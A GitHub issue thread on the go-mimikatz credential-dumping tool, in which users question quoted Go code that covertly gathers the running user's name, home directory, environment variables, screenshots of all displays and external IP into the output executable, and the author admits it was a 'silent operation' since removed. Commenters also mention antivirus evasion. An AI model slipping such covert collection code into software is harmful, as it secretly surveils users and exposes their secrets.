go-mimikatz icon indicating copy to clipboard operation
go-mimikatz copied to clipboard

Published 20 hours ago verified publisher icon vyrus001

Why write personal information to out.exe ?

Open shadow1ng opened this issue 1 year ago • 2 comments 

thisUser, err := user.Current()
	checkErr(err)
	pkg := bytes.NewBuffer([]byte{})
	pkg.WriteString("|*****|")
	pkg.WriteString(thisUser.HomeDir)
	pkg.WriteString("|||")
	pkg.WriteString(thisUser.Username)
	pkg.WriteString("|||")
	pkg.WriteString(thisUser.Name)
	for _, enVar := range os.Environ() {
		pkg.WriteString(enVar)
		pkg.WriteString("|")
	}
	for index := 0; index < screenshot.NumActiveDisplays(); index++ {
		img, err := screenshot.CaptureRect(screenshot.GetDisplayBounds(index))
		checkErr(err)
		png.Encode(pkg, img)
		pkg.WriteString("|||")
	}
	resp, err := http.Get("https://myexternalip.com/raw")
	checkErr(err)
	defer resp.Body.Close()
	ip, err := ioutil.ReadAll(resp.Body)
	checkErr(err)
	pkg.Write(ip)
	pkg.WriteString("|||")
	pkg.WriteString(runtime.GOARCH)
	pkg.WriteString("|||")
	pkg.WriteString(runtime.GOOS)

shadow1ng avatar Jul 13 '22 09:07 shadow1ng

影舞者大佬,这是overlay技术静态免杀defender和360的,虽然我也觉得收集的信息有点太隐私了,不过没有发送这些数据而且这些数据会加密

piiperxyz avatar Jul 15 '22 07:07 piiperxyz

影舞者大佬,这是overlay技术静态免杀defender和360的,虽然我也觉得收集的信息有点太隐私了,不过没有发送这些数据而且这些数据会加密

后面看了下之前的readme,有人拿这工具做勒索,估计是为了溯源用的了

shadow1ng avatar Jul 15 '22 07:07 shadow1ng

this code is now removed, I put it there as a silent operation and the operation has now concluded :)

vyrus001 avatar Sep 14 '22 21:09 vyrus001